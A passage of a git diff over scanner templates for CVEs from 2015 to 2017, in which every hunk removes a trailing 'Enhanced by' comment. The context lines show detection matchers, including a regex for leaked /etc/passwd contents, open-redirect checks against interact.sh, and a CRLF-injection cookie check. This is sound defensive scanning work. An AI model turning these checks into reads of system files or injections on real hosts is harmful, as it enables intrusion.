a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 67123711ab..02e5542a5a 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by cs on 2022/02/25 + diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 5676ccf215..c92c98ced8 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -61,4 +61,4 @@ http: status: - 400 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 479fa73403..34a46080dd 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index b18f0b8d14..13cbdb1606 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -36,4 +36,4 @@ http: words: - "" -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 3c03cc3dcd..cec755d224 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -41,4 +41,4 @@ http: words: - text/html -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index f18c350f4e..90bbf274a7 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 7a32cc56b1..575236ed70 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -33,4 +33,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/09/30 + diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index d5fa99561c..46e938ef3f 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -32,4 +32,4 @@ http: - '{{md5({{num}})}}' part: body -# Enhanced by mp on 2022/03/02 + diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index fe15e88f08..d0ff37574f 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 6476c78b02..8b87effe79 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -59,4 +59,4 @@ http: words: - "dns" -# Enhanced by mp on 2022/05/10 + diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 60054ee2ee..a45955eeea 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -42,4 +42,4 @@ http: words: - "application/xml" -# Enhanced by mp on 2022/07/22 + diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 0a3c19b2c7..527b10948e 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -29,4 +29,4 @@ http: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header -# Enhanced by mp on 2022/09/30 + diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index a3492b17ef..1414d7da26 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -39,4 +39,4 @@ http: words: - text/ -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 0bf640b97f..64ab33869b 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -38,4 +38,4 @@ http: - "View Default Decorator" condition: and -# Enhanced by mp on 2022/09/30 + diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 72e566cf29..4a9791c6a6 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -30,4 +30,4 @@ http: words: - "http" -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index cb2b65651e..3255a68998 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -44,4 +44,4 @@ http: - 'contains(body_2, "newstatpress")' condition: and -# Enhanced by md on 2023/03/15 + diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index de7b039f46..5bc59670e9 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -43,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index ff69399631..962bfe7e4e 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/20 + diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 695f55f596..2a0209365c 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -37,4 +37,4 @@ http: - "(Runtime)" condition: and -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index fbd1f158a1..7e4265d828 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index f95d95c063..58c6774a73 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 + diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 24a80430a4..77e8bf0cdd 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 + diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 443cae3e74..bab9047c29 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -42,4 +42,4 @@ http: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 7754ec6e27..a08469bfcb 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index f544c7378f..a3e23a5b82 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 8be1bb2d0a..b08126acbf 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index cb837e770e..b0755c0126 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 560621b9b9..a9327597d2 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 0ec5c03ee4..992a315a81 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 826cf6f0cb..4469aa4658 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 2b9ac102f9..88728f29e3 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 1d5af96daa..62d7596a93 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index c8dad56d8b..586202bc9f 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -43,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index cb3f50b71b..5ef16f2261 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index be7f395d3a..730bb25702 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/24 + diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 9bd58c6ba4..8c46ef2b09 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 2343db06c3..6f4af47c52 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 94773f1d53..c32dcbfa64 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 31f2f50493..6f4b14b0d9 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 8277d9b653..7634678a0d 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 3abffcc305..fb08ce329b 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 2f906a05b1..371912636e 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index cad2fb059e..41766d6204 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 618e11b631..d510dbde2b 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 4af6f2c8ce..fff62ef313 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -56,4 +56,4 @@ http: status: - 302 -# Enhanced by mp on 2022/04/13 + diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index ff799121d8..140eb9a195 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/10 + diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index 3dd204fa23..89e8708dd4 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -36,4 +36,4 @@ http: status: - 404 -# Enhanced by mp on 2022/08/03 + diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 5ded96340e..07cac4b2f8 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -39,4 +39,4 @@ http: status: - 302 -# Enhanced by mp on 2022/10/12 + diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 0d6264ce12..b1266b1ba1 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/17 + diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index 04f3a6d74f..dd34ab77b4 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -51,4 +51,4 @@ http: - '!contains(body_3, "")' condition: and -# Enhanced by mp on 2022/04/12 + diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 4f8b27fe18..f083374fd4 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -39,4 +39,4 @@ http: - 200 - 500 -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index f3bbe803d0..eab942e450 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/12 + diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index e88a1400e8..f5ac74f2ff 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index e59066dd4e..e4cd57b8c9 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -35,4 +35,4 @@ http: words: - "http" -# Enhanced by mp on 2022/05/10 + diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index a18523d3f2..def83e50ff 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index b376316f88..a6bf228421 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -35,4 +35,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index d96f05a55b..4ded5a2a5c 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -29,4 +29,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 3acb26e141..20241c0477 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -28,4 +28,4 @@ http: regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' -# Enhanced by cs on 2022/02/14 + diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 14915babc9..dc21a94d5c 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -36,4 +36,4 @@ http: status: - 400 -# Enhanced by mp on 2022/04/04 + diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index df16e9116c..a04e9735ef 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -44,4 +44,4 @@ http: regex: - 'Success "([a-z]+)"' -# Enhanced by mp on 2022/05/10 + diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index c957708dad..4f5bfaae5b 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 5ac5fb9017..1d47d1161d 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2023/01/15 + diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 5049574c59..9170bbc92a 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -35,4 +35,4 @@ http: - "Memory map" part: body -# Enhanced by mp on 2022/05/10 + diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 6dcd009a41..5ef821fcc7 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -43,4 +43,4 @@ http: status: - 204 -# Enhanced by cs 09/23/2022 + diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 32aa3dfebe..0f2ca667dd 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -41,4 +41,4 @@ http: words: - text/html -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index c3abfeccd6..b2518d5c49 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -41,4 +41,4 @@ http: words: - text/html -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index ff6b246328..d603a674c1 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -34,4 +34,4 @@ http: status: - 500 -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index 4bd38b9548..16b7652c47 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -43,4 +43,4 @@ http: - "status_code == 200" condition: and -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index cce0722b83..711f1a6d0a 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/10/24 + diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 7baf2778a1..14a2f54cfb 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -30,4 +30,4 @@ http: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' part: header -# Enhanced by md on 2023/02/08 + diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index f5b037eb72..1ce0a3f6a4 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index 9fe1228135..f24b8d1617 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -36,4 +36,4 @@ http: - 'Mogwailabs: CHECKCHECK' part: header -# Enhanced by mp on 2022/05/10 + diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 9fe9e66a87..f26ef6da34 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -45,4 +45,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/12 + diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 53753d5141..06a12fd1b7 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -98,4 +98,4 @@ http: - status_code == 200 condition: and -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 419e2afe3a..807db28835 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -38,4 +38,4 @@ http: dsl: - '!contains(tolower(body), "" condition: and -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 1e9b9a6e9a..c10fec57cf 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/31 + diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 127b25158d..0964e963e0 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -38,4 +38,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/13 + diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 4196407987..e29104b974 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -54,4 +54,4 @@ http: - 200 - 500 -# Enhanced by mp on 2022/05/11 + diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index e5a4e00a36..7bb7b20946 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/11 + diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index aa326183b1..794adb7b24 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 17341ed85f..0fba7d49e6 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index 789cb2a0d5..3580217dd7 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/11 + diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 31dc6cd7e4..5fda73b950 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -59,4 +59,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index d574c8f11c..9c54d8030e 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -44,4 +44,4 @@ http: regex: - '"name"\:"(.*?)"' -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index a2659354af..3c4d30fdde 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -54,4 +54,4 @@ http: - 201 - 409 -# Enhanced by mp on 2022/05/11 + diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 4f7b6f6235..113f9141da 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -38,4 +38,4 @@ http: condition: and part: body -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 6764f0ceab..b84fe0b56f 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ 